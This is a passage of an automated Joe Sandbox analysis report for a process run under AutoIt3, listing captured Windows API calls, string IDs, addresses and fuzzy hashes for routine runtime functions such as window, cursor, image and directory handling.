                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 48b6cdafd51405f5e4fa60e2d07752a1ec4b9c89dc61c7ba9711b27093cbf48d
                                      • Instruction ID: 30dbc4b15d5538da6e4e484d082bf7c67e06f33dacb3cb5bf08f822f1e4cdcdc
                                      • Opcode Fuzzy Hash: 48b6cdafd51405f5e4fa60e2d07752a1ec4b9c89dc61c7ba9711b27093cbf48d
                                      • Instruction Fuzzy Hash: CDB15771604B41AFD744EF68C849A6ABBE4FF88310F008A1DF599DB291DB71E805CF92
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • GetForegroundWindow.USER32(00890980,?,?,?,?,?), ref: 008204E3
                                      • IsWindow.USER32(?), ref: 008566BB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Foreground_memmove
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 3828923867-1919597938
                                      • Opcode ID: 4295f9bdc58508ed5de169f019333f896655cd25e248d982e815166e04e64e5c
                                      • Instruction ID: 19296bf6b469ac3419349e67383bd5d0560125dee50f935d1625132e6dbe2e40
                                      • Opcode Fuzzy Hash: 4295f9bdc58508ed5de169f019333f896655cd25e248d982e815166e04e64e5c
                                      • Instruction Fuzzy Hash: 56D1B270104206EFCB04EF64D4419AABBA5FF64349F504A19F955C32A2EB30E9ADCF92
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03D0247A
                                      • CreateCompatibleDC.GDI32(00000001), ref: 03D024DF
                                      • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 03D024F4
                                      • SelectObject.GDI32(?,00000000), ref: 03D024FE
                                      • SelectPalette.GDI32(?,?,00000000), ref: 03D0252E
                                      • RealizePalette.GDI32(?), ref: 03D0253A
                                      • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 03D0255E
                                      • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,03D025B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 03D0256C
                                      • SelectPalette.GDI32(?,00000000,000000FF), ref: 03D0259E
                                      • SelectObject.GDI32(?,?), ref: 03D025AB
                                      • DeleteObject.GDI32(00000000), ref: 03D025B1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                      • String ID: ($BM
                                      • API String ID: 2831685396-2980357723
                                      • Opcode ID: 36b5b97c4fd3fc11ae7febbb7e9dd0f10f55bc82700164e8eca1c3633135a3ca
                                      • Instruction ID: 03522665624a2b4295a4a2ef68cc096b8e5c9bfc5664f4ce19e801903dcbdbdb
                                      • Opcode Fuzzy Hash: 36b5b97c4fd3fc11ae7febbb7e9dd0f10f55bc82700164e8eca1c3633135a3ca
                                      • Instruction Fuzzy Hash: 2CD14D74E012489FDF14DFA8C898BAEBBB5FF48700F058869E915EB394D7349841CB65
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 008844AC
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0088456C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 563278871b8caea12d2380bd0e9d1e7111aa2f858087b0371e6097b8f845a068
                                      • Instruction ID: a1f94686ee0cebf1e68f8ef7b45e407c4c732e56ef9f0ae837ffd904e4b48ea6
                                      • Opcode Fuzzy Hash: 563278871b8caea12d2380bd0e9d1e7111aa2f858087b0371e6097b8f845a068
                                      • Instruction Fuzzy Hash: AFA18B712146169FCB14FF68C851A6AB3A5FF85314F105928F996DB3D2DB30EC09CB52
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 008756E1
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 008756EC
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 008756F7
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00875702
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0087570D
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00875718
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00875723
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0087572E
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00875739
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00875744
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0087574F
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0087575A
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00875765
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00875770
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0087577B
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00875786
                                      • GetCursorInfo.USER32(?), ref: 00875796
                                      • GetLastError.KERNEL32(00000001,00000000), ref: 008757C1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$ErrorInfoLast
                                      • String ID:
                                      • API String ID: 3215588206-0
                                      • Opcode ID: 942701210c3edb15a2c97e927faa7dec9ddc782b583778ef17f3bc96b60c1ab0
                                      • Instruction ID: 3412dbc25b77f58b4c6371a31a7f4309be04825f4b3abdd30539d4c6718887f0
                                      • Opcode Fuzzy Hash: 942701210c3edb15a2c97e927faa7dec9ddc782b583778ef17f3bc96b60c1ab0
                                      • Instruction Fuzzy Hash: C2416270E04319AADB109FBA8C49D6EFFF8FF41B50B10452FE519E7290DAB8A500CE51
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085B17B
                                      • __swprintf.LIBCMT ref: 0085B21C
                                      • _wcscmp.LIBCMT ref: 0085B22F
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0085B284
                                      • _wcscmp.LIBCMT ref: 0085B2C0
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0085B2F7
                                      • GetDlgCtrlID.USER32(?), ref: 0085B349
                                      • GetWindowRect.USER32(?,?), ref: 0085B37F
                                      • GetParent.USER32(?), ref: 0085B39D
                                      • ScreenToClient.USER32(00000000), ref: 0085B3A4
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085B41E
                                      • _wcscmp.LIBCMT ref: 0085B432
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0085B458
                                      • _wcscmp.LIBCMT ref: 0085B46C
                                        • Part of subcall function 0082385C: _iswctype.LIBCMT ref: 00823864
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                      • String ID: %s%u
                                      • API String ID: 3744389584-679674701
                                      • Opcode ID: cd7a27045b99bf6085103062ed246f65bf6b3fd5ea7c44ca19e18b85ee93d7f9
                                      • Instruction ID: e0b94ef4a9996ae5fcb5d845f6c2d958d201c74b9d0e302b142532a726121d5d
                                      • Opcode Fuzzy Hash: cd7a27045b99bf6085103062ed246f65bf6b3fd5ea7c44ca19e18b85ee93d7f9
                                      • Instruction Fuzzy Hash: C9A1F071204306AFDB24DF64C884BEAB7E8FF64356F004529FD99D2191DB30E959CBA1
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0085BAB1
                                      • _wcscmp.LIBCMT ref: 0085BAC2
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0085BAEA
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0085BB07
                                      • _wcscmp.LIBCMT ref: 0085BB25
                                      • _wcsstr.LIBCMT ref: 0085BB36
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085BB6E
                                      • _wcscmp.LIBCMT ref: 0085BB7E
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0085BBA5
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0085BBEE
                                      • _wcscmp.LIBCMT ref: 0085BBFE
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0085BC26
                                      • GetWindowRect.USER32(00000004,?), ref: 0085BC8F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 80b79d08fad8fb99af9205dadb3b6d35c1bdeb2c98598dfa56a1d715e40a1291
                                      • Instruction ID: 6dc556fd876aee89d3f0ac6e828420fcc12be482dbe0a24c346dbcb21adc4a4f
                                      • Opcode Fuzzy Hash: 80b79d08fad8fb99af9205dadb3b6d35c1bdeb2c98598dfa56a1d715e40a1291
                                      • Instruction Fuzzy Hash: 8F81AF710042099FDB01DF14C885FAA77E8FF64325F04846AFD89CA096DB34DD49CB62
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 9f854f25a2a3e1a8e7f26eb4a9364bd07b38df00da31651c61c6322c94057368
                                      • Instruction ID: cad46cea848f5f4b2a64f57558696ca9517c21adc61c0d77f553415434ef493f
                                      • Opcode Fuzzy Hash: 9f854f25a2a3e1a8e7f26eb4a9364bd07b38df00da31651c61c6322c94057368
                                      • Instruction Fuzzy Hash: 9D31EF70A44209A6CE08EB54CC43EED7BA8FF31791F200125FA60F12D1FF69AE488587
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0085CBAA
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0085CBBC
                                      • SetWindowTextW.USER32(?,?), ref: 0085CBD3
                                      • GetDlgItem.USER32(?,000003EA), ref: 0085CBE8
                                      • SetWindowTextW.USER32(00000000,?), ref: 0085CBEE
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CBFE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0085CC04
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0085CC25
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0085CC3F
                                      • GetWindowRect.USER32(?,?), ref: 0085CC48
                                      • SetWindowTextW.USER32(?,?), ref: 0085CCB3
                                      • GetDesktopWindow.USER32 ref: 0085CCB9
                                      • GetWindowRect.USER32(00000000), ref: 0085CCC0
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0085CD0C
                                      • GetClientRect.USER32(?,?), ref: 0085CD19
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0085CD3E
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0085CD69
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      APIs
                                      • _memset.LIBCMT ref: 0088A87E
                                      • DestroyWindow.USER32(?,?), ref: 0088A8F8
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0088A972
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0088A994
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088A9A7
                                      • DestroyWindow.USER32(00000000), ref: 0088A9C9
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00800000,00000000), ref: 0088AA00
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0088AA19
                                      • GetDesktopWindow.USER32 ref: 0088AA32
                                      • GetWindowRect.USER32(00000000), ref: 0088AA39
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0088AA51
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0088AA69
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 1297703922-3619404913
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • DragQueryPoint.SHELL32(?,?), ref: 0088CCCF
                                        • Part of subcall function 0088B1A9: ClientToScreen.USER32(01183D90,?), ref: 0088B1D2
                                        • Part of subcall function 0088B1A9: GetWindowRect.USER32(?,?), ref: 0088B248
                                        • Part of subcall function 0088B1A9: PtInRect.USER32(?,?,0088C6BC), ref: 0088B258
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088CD38
                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0088CD43
                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0088CD66
                                      • _wcscat.LIBCMT ref: 0088CD96
                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0088CDAD
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0088CDC6
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088CDDD
                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0088CDFF
                                      • DragFinish.SHELL32(?), ref: 0088CE06
                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0088CEF9
                                      Similarity
                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                      • API String ID: 169749273-3440237614
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0086831A
                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00868323
                                      • VariantClear.OLEAUT32(00000000), ref: 0086832F
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0086841D
                                      • __swprintf.LIBCMT ref: 0086844D
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00868479
                                      • VariantInit.OLEAUT32(?), ref: 0086852A
                                      • SysFreeString.OLEAUT32(?), ref: 008685BE
                                      • VariantClear.OLEAUT32(?), ref: 00868618
                                      • VariantClear.OLEAUT32(?), ref: 00868627
                                      • VariantInit.OLEAUT32(00000000), ref: 00868665
                                      Similarity
                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                      • API String ID: 3730832054-3931177956
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00884A61
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00884AAC
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                      • API String ID: 3974292440-4258414348
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0088BF26
                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00887136,?), ref: 0088BF82
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088BFBB
                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0088BFFE
                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088C035
                                      • FreeLibrary.KERNEL32(?), ref: 0088C041
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0088C051
                                      • DestroyIcon.USER32(?), ref: 0088C060
                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0088C07D
                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0088C089
                                        • Part of subcall function 0082312D: __wcsicmp_l.LIBCMT ref: 008231B6
                                      Similarity
                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                      • String ID: .dll$.exe$.icl
                                      • API String ID: 1212759294-1154884017
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 0086E31F
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0086E32F
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0086E33B
                                      • __wsplitpath.LIBCMT ref: 0086E399
                                      • _wcscat.LIBCMT ref: 0086E3B1
                                      • _wcscat.LIBCMT ref: 0086E3C3
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086E3D8
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E3EC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E41E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E43F
                                      • _wcscpy.LIBCMT ref: 0086E44B
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0086E48A
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                      • String ID: *.*
                                      • API String ID: 3566783562-438819550
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0086A2C2
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0086A2E3
                                      • __swprintf.LIBCMT ref: 0086A33C
                                      • __swprintf.LIBCMT ref: 0086A355
                                      • _wprintf.LIBCMT ref: 0086A3FC
                                      • _wprintf.LIBCMT ref: 0086A41A
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-3080491070
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0084F8B8,00000001,0000138C,00000001,00000000,00000001,?,00873FF9,00000000), ref: 0086009A
                                      • LoadStringW.USER32(00000000,?,0084F8B8,00000001), ref: 008600A3
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • GetModuleHandleW.KERNEL32(00000000,008C7310,?,00000FFF,?,?,0084F8B8,00000001,0000138C,00000001,00000000,00000001,?,00873FF9,00000000,00000001), ref: 008600C5
                                      • LoadStringW.USER32(00000000,?,0084F8B8,00000001), ref: 008600C8
                                      • __swprintf.LIBCMT ref: 00860118
                                      • __swprintf.LIBCMT ref: 00860129
                                      • _wprintf.LIBCMT ref: 008601D2
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008601E9
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 984253442-2268648507
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CharLowerBuffW.USER32(?,?), ref: 0086AA0E
                                      • GetDriveTypeW.KERNEL32 ref: 0086AA5B
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AAA3
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AADA
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086AB08
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Similarity
                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                      • API String ID: 2698844021-4113822522
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0086A852
                                      • __swprintf.LIBCMT ref: 0086A874
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0086A8B1
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0086A8D6
                                      • _memset.LIBCMT ref: 0086A8F5
                                      • _wcsncpy.LIBCMT ref: 0086A931
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0086A966
                                      • CloseHandle.KERNEL32(00000000), ref: 0086A971
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0086A97A
                                      • CloseHandle.KERNEL32(00000000), ref: 0086A984
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2733774712-3457252023
                                      Similarity
                                      • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                      • String ID:
                                      • API String ID: 884005220-0
                                      • Opcode ID: 4f43c563de1facc822cf5b77f62d2072e8e9806a2d91a8ab7e8d4ce46cd8bdc6
                                      • Instruction ID: 72e61ed82ceb46ae614841b3d3889235c2313bcd6936df428785358df42fb514
                                      • Instruction Fuzzy Hash: C3610672901215EFEB295F28EC41B69B7A9FF91331F14411AE881EB1D1DB78D8818BD3
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0088C0C8
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0088C0DF
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0088C0EA
                                      • CloseHandle.KERNEL32(00000000), ref: 0088C0F7
                                      • GlobalLock.KERNEL32(00000000), ref: 0088C100
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0088C10F
                                      • GlobalUnlock.KERNEL32(00000000), ref: 0088C118
                                      • CloseHandle.KERNEL32(00000000), ref: 0088C11F
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0088C130
                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00893C7C,?), ref: 0088C149
                                      • GlobalFree.KERNEL32(00000000), ref: 0088C159
                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 0088C17D
                                      • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0088C1A8
                                      • DeleteObject.GDI32(00000000), ref: 0088C1D0
                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0088C1E6
                                      Similarity
                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                      • String ID:
                                      • API String ID: 3840717409-0
                                      • Opcode ID: dc3a0b4c886dd49bde3a873db55108de8815e834e869d33e95027d4ee53b2e0f
                                      • Instruction ID: ce4d3c38304ad081aa86cd377272c311214e1c54e7b65ab8d1ee782fcd52a861
                                      • Instruction Fuzzy Hash: C4411875600208AFDB21AFA5DC8CEAA7BB8FF89711F144159F90AE7261D7309941DF60
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 0086E053
                                      • _wcscat.LIBCMT ref: 0086E06B
                                      • _wcscat.LIBCMT ref: 0086E07D
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086E092
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E0A6
